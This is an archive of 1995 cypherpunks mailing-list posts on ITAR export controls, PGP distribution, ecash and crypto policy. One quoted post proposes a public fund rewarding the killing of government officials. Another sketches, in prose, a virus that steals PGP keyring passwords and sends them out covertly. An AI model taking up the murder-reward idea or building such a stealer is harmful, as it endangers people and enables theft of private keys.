>> software IN the US?  It occurs to me that one way to do this might be to
>> send one of their programmers to a conveniently-located place, such as
>> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
>> deal of fanfare, and tell him to "write some crypto."  He does, and brings
>> it back into the US with him, leaving a copy of it "outside" the country for
>> international distribution.
>> 
>    <attila sez>  I think they have that one covered --not only is it 
>violation of ITAR's intent to send a programmer out of the U.S.

Well, don't assume that because something's a "violation of ITAR's INTENT"
it is actually a violation of ITAR.    It can't be assumed that ITAR is
_perfect_:  That it actually prohibits every activity the government that
wrote it didn't like.

, but is 
>illegal to hire a foreign national to program for your non-U.S. products.

Sure about this?!?

>    the test is going to be with someone like Sun who "bought" a group of 
>Russian crypto programmers and left them in Russia.  Now, the problem 
>with ITAR is that if you import that code, you can not then export the 
>code since it is now covered by ITAR.

I didn't say that the code would ever be "re-exported":  A copy would be
brought into the US for domestic use, and everyone else outside the border
would get their own copy from an outside server. 


>    secondly, it appears there is a move afoot to make it an ITAR 
>violation to hire the foreign nationals to circumvent ITAR --basically, 
>the Feds want to stop cryptography _everywhere_, including telling 
>Russians they can not work for U.S. companies!  Just where do they think 
>they are getting off?

It is for this kind of problem that I "invented" my concept of
"Assassination Politics":  If everybody pissed off at this situation was
willing to donate $10 to a fund to reward the deaths of a few government
officials responsible for ITAR, I can well imagine that this would shake
them up a bit.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 25 Nov 1995 00:14:46 +0800
To: cypherpunks@toad.com
Subject: CJR_war
Message-ID: <199511241605.LAA19328@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   SciAm, December, 1995:


   "Fighting Future Wars. U.S. military planners may be
   preparing for the wrong conflict."

      Policy experts, technical gurus and defense contractors
      have begun to study a range of other potential threats,
      from a newly hatched superpower to a regional power with
      dramatically altered fighting tactics, to legions of
      mercenary hackers that bring down banks and stock
      exchanges with computer viruses and other malevolent
      software. The vast array of scenarios is a measure of
      the speculative turn that has gripped the
      military-planning establishment.

      Debate on high-tech fighting culminates in the question
      of whether information technologies -- a computer virus,
      for one -- could make conventional military hardware
      obsolete and whether they would make possible a virtual
      invasion of the continental U.S. A battle of the bits
      would be fought by destroying an enemy's information
      assets, its financial, electrical, telecommunications
      and air-traffic-control networks. Direct strikes at the
      military would not be ruled out: cracking a government
      computer is already a not infrequent hacker rite of
      passage. In addition, more than 95 percent of military
      communications travel over public networks.


   CJR_war













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 25 Nov 1995 00:16:45 +0800
To: cypherpunks@toad.com
Subject: SEL_ane
Message-ID: <199511241607.LAA19557@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   As previously noted here: SciAm, December, 1995:


   "Confidential Communication on the Internet." By Thomas
   Beth, director of the European Institute for System
   Security and professor of computer science at the
   university of Karlsruhe.

      Chain of certification in the author's scheme, SELANE,
      extends from local authorities who vouch for an
      individual's identity and probity up through regional,
      national and supranational authorities, each vouching
      for those below it. Digital signatures prevent
      tampering; anyone who recognizes one signature in the
      chain can be assured that a signed document is valid.

      SELANE is compatible with almost every commercial and
      academic network. It also provides a "smart" card that
      can carry out the necessary calculations securely for
      each user. And it addresses the conflicts of government
      and privacy interests when wire-tapping is needed.


   SEL_ane








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Kenney <saken@chardos.connix.com>
Date: Sat, 25 Nov 1995 01:05:38 +0800
To: mix-l@jpunix.com
Subject: ANNOUNCE - Amnesia Remailer now public
Message-ID: <199511241656.LAA05960@chardos.connix.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 25 Nov 1995 06:50:35 +0800
To: "Mark M." <markm@omni.voicenet.com>
Subject: Re: Export control FTP servers
In-Reply-To: <9511232220.AA19031@hplyot.obspm.fr>
Message-ID: <9511241106.AA20922@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. writes:
 > I just used the following simple shell script.  Not very secure but does
 > the trick for the purposes of export controlled directories.
 > #!/bin/sh
 > (date; uptime; ps -e; netstat; set) | md5sum
That one is quite good, you could also feed $1 which would be the
previous "pass".
Btw I'd suggest that you use netstat -n if you don't want it to take
ages to resolve all the IP->name.


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

PLO [Hello to all my fans in domestic surveillance] Mossad FSF class
 struggle explosion hack




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Sat, 25 Nov 1995 02:28:44 +0800
To: cypherpunks@toad.com
Subject: Re: real life problems with ITAR (was Spam the Sign!)
In-Reply-To: <604.9511240945@exe.dcs.exeter.ac.uk>
Message-ID: <4952bt$595@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <604.9511240945@exe.dcs.exeter.ac.uk>,  <aba@atlas.ex.ac.uk> wrote:
>Something that is puzzling me is how DigiCash is doing.  Their
>software I think is ITAR regulated (or would be if it were shipped
>from a US ftp site).  OK, so they get around it by shipping their
>software from Digicash, Bv, Netherlands.
>
>But, somewhere on their pages it mentions that: "Digicash, Bv is a
>wholly owned subsidiary of Digicash" (which *is* based in the US).
>
>Does that make them a counter example who is currently getting away
>with it?  Just to complicate things further David Chaum is a US
>citizen, right?  Maybe he himself is ok because he doesn't write the
>code himself, the digicash development team does.  Is Digicash (US)
>hiring (collectively) Digicash, Bv if it is a wholly owned subsidiary,
>in US legal terms?

<IANAL>
Even if DigiCash gave a <exon> about ITAR and the NSA, ecash probably
wouldn't be covered anyway, because the ITAR has a specific exception
for encrypting financial data (that's so you can use your credit and bank
cards overseas).
</IANAL>

   - Ian "What's with this day-after-thanksgiving, anyway...?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 25 Nov 1995 05:47:24 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Sun rumor [WAS Re: real life problems with ITAR (was Spam the Sign!)]
In-Reply-To: <Pine.SUN.3.91.951124152336.28283G-100000@viper.law.miami.edu>
Message-ID: <Pine.SOL.3.91.951124133617.25364A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 Nov 1995, Michael Froomkin wrote:
> 
> I've heard this story several times from many different people.  Anyone
> have any evidence that it's true? (My friends at Sun say they haven't
> heard the story, but don't work in the parts that would have necessarily
> heard it.)

It sounds like something I heard from John Gage, though the rumors may be 
getting conflated with Suns purchace of the entire Soviet super-computer 
industry in (I think) '92. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark C. Henderson" <mch@squirrel.com>
Date: Sat, 25 Nov 1995 05:57:36 +0800
To: Tim Philp <x93ojg@juliet.stfx.ca>
Subject: Re: PGP in Canada
In-Reply-To: <Pine.OSF.3.91.951123073901.6893B-100000@nic.wat.hookup.net>
Message-ID: <9511241348.ZM19179@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


On Nov 23,  7:41, Tim Philp wrote:
> Subject: Re: PGP in Canada
> You can try to get PGP from the MIT site but it may not allow you to do
> so if it does not recognize your address as being Canadian.

You can also get pgp from a Canadian site.

Get the file

ftp://ftp.wimsey.com/pub/crypto/software/README

for instructions and conditions (export restrictions).

-- 
Mark Henderson -- markh@wimsey.bc.ca, henderso@netcom.com, mch@squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer  --  ftp://ftp.wimsey.com/pub/crypto
ftp://ftp.wimsey.com/pub/crypto/sun-stuff/change-sun-hostid-1.5.1.tar.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 Nov 1995 03:49:41 +0800
To: gjeffers@socketis.net
Subject: Re: crypto for porno users
Message-ID: <01HY0WLMKRLG8WYLO9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: gjeffers@socketis.net (Gary Jeffers)

   The SecureDrive 1.4 disk encryptor system solves their computer site
disk storage problem. It also gives them the solution to the "rubber hose"
problem. With a "damaged" key file and the use of a password, they have
an effective defense against court orders demanding keys. (see the docs
for SecureDrive 1.4). Also disk encryptors not only encrypt files but also
solve the problem of temporary work files that are used by many software
packages (They can be reconstructed).
-----------------------
	Does anyone know of any strong encryptor systems that encrypt a
MS-DOS directory with subdirectories, as opposed to a partition? Aside from
convenience, this does have the potential advantage that if you did some FAT,
etcetera manipulation, it wouldn't be possible to figure out what was garbage
and what was encrypted without the program running properly (i.e., have an
emergency hotkey combination that wiped the currently used password/phrase and
removed the program and the alterations to the FAT).
	Also nice would be working off of a key on a 3.5" floppy, so it can
be removed when not in use (thus reducing the need for typing in a
password/phrase every few minutes). It should be compatible with Stacker and
similar compression systems if possible, although it could also be run on the
uncompressed drive- that way it'd take up more space, however.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas E Zerucha <zerucha@shell.portal.com>
Date: Sat, 25 Nov 1995 06:58:50 +0800
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: Virus attacks on PGP
In-Reply-To: <Pine.LNX.3.91.951124152257.5757A-100000@micro.internexus.net>
Message-ID: <Pine.SUN.3.90.951124143054.15604C-100000@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 Nov 1995, Laszlo Vecsey wrote:

> > > Where can one get PGP burnt into cdrom? Or the equiptment to do it
> > 
> > If you can wait a while, TERENA (UKERNA, SURFnet, etc) are producing a PGP CD
> > at the start of next year ...
> 
> Would PGP on CD-ROM truely gaurantee a corrupt/virus free executable? A 
> virus already running in memory could tamper with what it's doing, 
> perhaps extracting the necessary keys and dumping them to a log file.
> This would be especially dangerous on a UNIX system where many people 
> might be using PGP, thinking it is secure.
> 
> I think the only way to be safe is to actually boot up off of the CD-ROM, 
> and hope that the hardware in your computer physically hasn't been 
> tampered with :)
> 

My original post mentioned two things, the other was to cross-compile the 
sources.  Maybe do it on 3 different systems (e.g. Sun, HP and DEC), and 
compare the binaries, then burn a CD.  A virus would have to be very 
versatile to infect multiple platforms and insert code for another.

It would also be silly for a virus to just dump keys when PGP runs, it 
would be far easier to look for any occurance of secring.pgp, and mail 
it, and/or monitor when it was opened and record keystrokes.  And log files
must go somewhere.

I don't know if I mentioned, but I keep PGP and my keys on pcmcia memory 
cards that aren't in the system at the same time as a network or modem 
card.  Moreover I can also simply use the DOS version (I use linux to 
communicate) - It would require quite an effort to create a virus that 
would work and pass data across the required OS problems and not break 
with the twice a week kernel-level changes :).

ViaCrypt also has a PCMCIA implementation of pgp, and it should be fairly 
easy to implement in an ASIC, or small embedded micro.  That would be 
much harder to compromise.  Of course anything so useful commercially 
woudl be the subject of our legal system.

It takes quite an effort to create a complex virus to do this.  It 
reminds me of the Glomar Challenger that was used to recover the remains 
of a russian sub (my memory is somewhat faulty).  Such a virus would 
require a great investment in time and money.  What target would be worth it?
Many otherwise feasible things aren't economically pracitcal.

zerucha@shell.portal.com -or- 2015509 on MCI Mail
  finger zerucha@jobe.portal.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Sat, 25 Nov 1995 06:36:09 +0800
To: "JackShimek@aol.com>
Subject: Fwd: Re: using ecash
Message-ID: <199511242334.PAA03668@chico.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

------- FORWARD, Original message follows -------

Date: Friday, 24-Nov-95 03:38 PM

From: Mark Twain Ecash Support \ Internet:    (mtwain@netcom.com)
To:   J. Kent Hastings         \ Internet:    (zeus@pinsight.com)

Subject: Re: using ecash

> During the "play money" beta test, I saw "BEGIN E-CASH PAYMENT" messages
> that looked like a PGP format.

> I'd like to know if the Mark Twain "real money" US Dollar software has
this
> feature, too.

Mark Twain Ecash does allow for ASCII email payments.

> The "heavy user" personal account has a 3 percent fee to withdraw, but
> verify that just to make sure.

With a Heavy User account you can move a hundred USD in or out of the  Mint
fee of charge.

For the second hundred USD the rate is 3%, but the money movement fee  is
counted against your monthly fee of $2, so you only pay 3$ - 2$ =  1$ for
the second hundred.


-- Mark Twain Ecash Support
   <mailto:support@marktwain.com>
   <http://www.marktwain.com/ecash.html>


------- FORWARD, End of original message -------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Sat, 25 Nov 1995 03:26:43 +0800
To: Thomas E Zerucha <zerucha@shell.portal.com>
Subject: Re: Virus attacks on PGP
In-Reply-To: <Pine.SUN.3.90.951120144320.25327E-100000@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.951124150849.7425A-100000@prufrocks.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain



    Where can one get PGP burnt into cdrom? Or the equiptment to do it
             Thanks in advance
                 moroni





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Sat, 25 Nov 1995 08:04:37 +0800
To: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>
Subject: Re: crypto for porno users
In-Reply-To: <199511232149.PAA21305@khijol>
Message-ID: <Pine.LNX.3.91.951124151506.7425B-100000@prufrocks.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


I wish we could get off the subject of the kiddie porn , it makes me 
wonder what people on this list are doing when they are not mailing out 
letters. Not to flame ,BUT it is such a serious issue and we all as 
adults and approaching adults should not treat it as an academic issue . 
It is the most victimizing of all crimes and I think of speak for some of 
us when I say that it would be better if we all found a way to get back 
to discussing the problems of cryptography as related to we not 
pornographers.

               Thanks in Advance 
                     moroni





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 25 Nov 1995 04:36:09 +0800
To: attila <attila@primenet.com>
Subject: Sun rumor [WAS Re: real life problems with ITAR (was Spam the Sign!)]
In-Reply-To: <Pine.BSD.3.91.951124073019.12402G-100000@usr4.primenet.com>
Message-ID: <Pine.SUN.3.91.951124152336.28283G-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 Nov 1995, attila wrote: [....]
>     the test is going to be with someone like Sun who "bought" a group of 
> Russian crypto programmers and left them in Russia.  Now, the problem 
> with ITAR is that if you import that code, you can not then export the 
> code since it is now covered by ITAR.
[....]

I've heard this story several times from many different people.  Anyone
have any evidence that it's true? (My friends at Sun say they haven't
heard the story, but don't work in the parts that would have necessarily
heard it.)

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sat, 25 Nov 1995 04:39:43 +0800
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: Virus attacks on PGP
In-Reply-To: <"swan.cl.cam.:180670:951124195035"@cl.cam.ac.uk>
Message-ID: <Pine.LNX.3.91.951124152257.5757A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> > Where can one get PGP burnt into cdrom? Or the equiptment to do it
> 
> If you can wait a while, TERENA (UKERNA, SURFnet, etc) are producing a PGP CD
> at the start of next year ...

Would PGP on CD-ROM truely gaurantee a corrupt/virus free executable? A 
virus already running in memory could tamper with what it's doing, 
perhaps extracting the necessary keys and dumping them to a log file.
This would be especially dangerous on a UNIX system where many people 
might be using PGP, thinking it is secure.

I think the only way to be safe is to actually boot up off of the CD-ROM, 
and hope that the hardware in your computer physically hasn't been 
tampered with :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Sat, 25 Nov 1995 07:05:21 +0800
To: cypherpunks@toad.com
Subject: Re: Sun speaks out - but not to the cypherpunks
In-Reply-To: <199511050203.SAA01370@jobe.shell.portal.com>
Message-ID: <495i89$1db@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com writes:

>The CBC (Canadian Broadcasting Corporation) detailed a software
>code problem in one of AECL's (Atomic Energy of Canada Limited's)
>instruments which deliver penetrating radiation.

>The software which controlled the radiation dose, would periodically
>override the oncologist's calibration and deliver a radiation dose
>100 times what was prescribed. This software "bug" literally killed
>wherever the machine was in use.

 . . .

>Or alternatively, another lesson could be pulled out: To avoid this
>problem, ensure that your code is mathematically provable or utilize
>appropriate hardware overrides.

If this is the same case I read of two or three years back, it
should be noted that not one but three safety interlocks had to fail
simultaneously -- one human, one hardware, one software.  The software
glitch has gotten the biggest play in the press, but it was not the
sole cause of the problem.
-- 
Yea, the heavens shall open and the NP-complete solution given forth.
ATT executives shall give birth to two-headed operating systems, and 
copyrights shall be expunged.  The voice of the GNU shall be heard,
but the faithless will be without transcievers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Still <x93ojg@juliet.stfx.ca>
Date: Sat, 25 Nov 1995 07:09:21 +0800
To: CypherPunks List <cypherpunks@toad.com>
Subject: (PGP in Canada) another new question.
In-Reply-To: <9511241348.ZM19179@squirrel.com>
Message-ID: <Pine.A32.3.91.951124190148.83732B-100000@juliet.stfx.ca>
MIME-Version: 1.0
Content-Type: text/plain


Is pgp able to be put on a university network and used by all the 
students?  I am again referring to use in Canada.

--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg@stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sat, 25 Nov 1995 04:03:32 +0800
To: Moroni <moroni@scranton.com>
Subject: Re: Virus attacks on PGP
In-Reply-To: <Pine.LNX.3.91.951124150849.7425A-100000@prufrocks.scranton.com>
Message-ID: <"swan.cl.cam.:180670:951124195035"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Where can one get PGP burnt into cdrom? Or the equiptment to do it

If you can wait a while, TERENA (UKERNA, SURFnet, etc) are producing a PGP CD
at the start of next year ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 25 Nov 1995 10:06:54 +0800
To: Gary Jeffers <gjeffers@socketis.net>
Subject: [rehash] Re: crypto for porno users
In-Reply-To: <199511241535.JAA30731@mail.socketis.net>
Message-ID: <Pine.3.89.9511242032.A16013-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Watch the cpunks go round and round and round and...

On Fri, 24 Nov 1995, Gary Jeffers wrote:

>    I know little of the theory of Dining Cryptographers but I would think
> that a good implementation of it would make infiltrators useless. I will
> leave it for other Cypherpunks to discuss the mechanics (specific and
> general) for actually doing this.

Dining Cryptographers nets (aka DC-nets) are the whole idea behind the
type 2 anon remailers like Mixmaster, and the remailernet in general.
You'll find a lot on this in the archives, the ftp site (which has Chaum's
DC article and a good explanation by Tim May) and a few peoples' pages. 
(I think they're mostly pointed to in the pages I list) 

You'll find Mixmaster at <http://obscura.com/~loki/Welcome.html>
Wei Dai posted some articles a few months ago about traffic analysis
of such remailers. He still has one of them at 
<http://www.eskimo.com/~weidai>
Sameer also has a two-way encrypted-command remailer. Check out 
<http://www.c2.org> for details.
The archives are at <http://www.hks.net/cpunks/index.html> (I realize
this has been posted n zillion times)

Wasn't there a DC-net mailing list once upon a time? (Tim mentions it in some
of his writings) Did this wither away or merge into the remailer-ops list?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sat, 25 Nov 1995 14:18:47 +0800
To: Thomas E Zerucha <master@internexus.net>
Subject: Re: Virus attacks on PGP
Message-ID: <acdc55c10202100472f8@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 2:46 PM 11/24/95, Thomas E Zerucha wrote:
....

>I don't know if I mentioned, but I keep PGP and my keys on pcmcia memory
>cards that aren't in the system at the same time as a network or modem
>card.  Moreover I can also simply use the DOS version (I use linux to
>communicate) - It would require quite an effort to create a virus that
>would work and pass data across the required OS problems and not break
>with the twice a week kernel-level changes :).
....
Yes it would be hard. When you choose your own protection as above an
opponent would have to mount a significant effort just to get your stuff.
....
>It takes quite an effort to create a complex virus to do this.  It
>reminds me of the Glomar Challenger that was used to recover the remains
>of a russian sub (my memory is somewhat faulty).  Such a virus would
>require a great investment in time and money.  What target would be worth it?
>Many otherwise feasible things aren't economically pracitcal.

Yes, but if your particular habits became widespread, an intelligence
agency could amortize the virus effort across many victims.

Here is just one such complicated virus:
Sit in the OS watching for PGP to be launched. Patch PGP on the way in. The
patch writes to disk the location and password for the secure key ring.
Concurrently the virus watches for there to be IP service and sends the
disk information as a UDP.
Alternatively the virus waits for idle time, (screen saver time) and dials
an 800 number having turned off the modem speaker. But don't send the same
data twice!

There is a significant hazard for the virus producer here if someone finds
the code and learns the 800 number. I am sure that the Telco would help
locate the physical phone to which the 800 number led. UDP provides more
ways to pigeon drop the secret so as to protect the reader of that data.
Perhaps you can send the UDP to the NY-Times (or to your favorite enemy)
over a line that you are tapping. The NYT will discard it and no one is the
wiser. The virus is then anonymous.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Sat, 25 Nov 1995 20:31:37 +0800
To: cypherpunks@toad.com
Subject: CJR_war
Message-ID: <Pine.BSD/.3.91.951124222618.23929A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain




      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Sat, 25 Nov 1995 11:42:46 +0800
To: cypherpunks@toad.com
Subject: Re: Virus attacks on PGP
In-Reply-To: <Pine.LNX.3.91.951124150849.7425A-100000@prufrocks.scranton.com>
Message-ID: <Pine.LNX.3.91.951124222957.107A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 24 Nov 1995, Moroni wrote:

> 
>     Where can one get PGP burnt into cdrom? Or the equiptment to do it
>              Thanks in advance
>                  moroni
> 
> 
> 

I remember seeing in computer catalog a device that can burn data into a
cdrom and it even supplies blank cd's.  Unfortunately, I cannot remember
the name of the catalog.  It might have been _Tiger Software_ or some
similar catalog.  I do know that the technology is available.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

iQCVAwUBMLaOlrZc+sv5siulAQGpUgQAnj4I6lhgOX6Q6U9PctJn4pFcW7ncRguT
Npv8w7GR5TzBY7fejmiwVGqjSkw86trCvJwwR42azd2XAYU9t8zlSNO/r+dbqGQY
1mmA5RGUAuP5FVvVKoJqq0eYBhixe0E+G9/hBftqNlNAsIEuQ+sRd1MkoR1zu4R+
27+lBhQ72as=
=j0/5
-----END PGP SIGNATURE-----


`finger -l markm@omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 26 Nov 1995 15:43:48 +0800
To: Moroni <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: crypto for porno users
Message-ID: <199511260734.XAA14199@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:14 PM 11/25/95 -0500, Moroni wrote:
>
>   I'm soory but I don't care if the images come from mars . Jerking off 
>to the images of kids is sick.

An image of a sixteen year old girl masturbating is classified 
as child pornography in American law:  Think about how old 
you were when you first engaged in sexual acts.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sun, 26 Nov 1995 04:51:44 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk Certification Authority
Message-ID: <Pine.SUN.3.91.951124235921.16448A@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


	Since now Netscape allows for user defined certification authorities
I would like to hear some ideas for a Cybpherpunk CA. Probably run by one 
of the respected member in the group such as Sammer, Perry or Tim. I would
like to hear some discussion about creating the certificates based on
the web of trust of your PGP key, etc. Any takers?

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 25 Nov 1995 15:18:27 +0800
To: cypherpunks@toad.com
Subject: Re: crypto for porno users
In-Reply-To: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu>
Message-ID: <PVV4eD33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu> writes:
>      The second is that given new image modification technologies,
> it is possible to produce what will seem child pornography, but
> with no actual harm done to children. In some ways, this product
> may reduce harm to children in some respects by providing a
> "competing product" to actual child pornography, and thus
> discourage its manufacture.
...

I recall that a man was recently convicted in Canada on child pornography
charges (sorry, can't recall the exact statute name) for, basically, drawing
naked kids on his computer. No children were harmed, or otherwise involved in
producing the material, but the courts found it to be child pornography.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 25 Nov 1995 09:31:24 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: real life problems with ITAR (was Spam the Sign!)
In-Reply-To: <m0tJ1o2-0008zJC@pacifier.com>
Message-ID: <Pine.BSD.3.91.951124185244.23968A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 Nov 1995, jim bell wrote:

> 
> Attila@primenet.com said:
> 
> >   On Thu, 23 Nov 1995, jim bell wrote: 
> > 
> >> I very much agree with the direction you appear to be headed in.  It seems
> >> to me that Netscape should have no problem devising some sort of scenario in
> >> which such a program eventually gets onto the nets, but in a way that is
> >> squeaky clean, at least for THEM.  
> >> 
> >> 
> >> In addition, why should they even need to write the encrytion part of their
> >> software IN the US?  It occurs to me that one way to do this might be to
> >> send one of their programmers to a conveniently-located place, such as
> >> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
> >> deal of fanfare, and tell him to "write some crypto."  He does, and brings
> >> it back into the US with him, leaving a copy of it "outside" the country for
> >> international distribution.
> >> 
> >    <attila sez>  I think they have that one covered --not only is it 
> >violation of ITAR's intent to send a programmer out of the U.S.
> 
> Well, don't assume that because something's a "violation of ITAR's INTENT"
> it is actually a violation of ITAR.    It can't be assumed that ITAR is
> _perfect_:  That it actually prohibits every activity the government that
> wrote it didn't like.
>
    	<#2 attila sez> the problem with the U.S. government is the U.S. 
    conspiracy laws. If they have insufficient evidence to convict on 
    "actual" violations, they use the concept that you were _part_ of a
    conspiracy to _circumvent_ the laws. 

 
> , but is 
> >illegal to hire a foreign national to program for your non-U.S. products.
> 
> Sure about this?!?
>
	<#2 attila> I dont have to push all my data into glimpse to find 
    the article, but it's there. there are other sources, but not open to 
    discussion; sorry.
 
> >    the test is going to be with someone like Sun who "bought" a group of 
> >Russian crypto programmers and left them in Russia.  Now, the problem 
> >with ITAR is that if you import that code, you can not then export the 
> >code since it is now covered by ITAR.
>
	<#2 attila> I guess I should have stated it better: what they are 
    trying to do, for instance with Sun, is treat that foreign entity as
    if it was a direct operating unit of the parent U.S. company.  OK,
    fine, you hire your Russian crypto programming team and my take from
    several conversation is that it is a _good_ team, but the U.S. wants
    to enforce the rule that the code produced in Russia for a "parent"
    American company is _a U.S. product_!  --in other words, the foreign
    division can not sell it overseas.  So far, noone has been charged, 
    but my sources say Sun is the most likely. 
	Either way you slice it, Sun is committed to world wide 
    compatability, and with that goes security, including worldwide NFS.
    You figure it out... 
	what is the alternative for Sun, or Netscape? yup, close down in 
    the U.S. and go to Holland --oh, they can keep their sales offices in
    the U.S.  --but they will be paying import duty, or they will end up
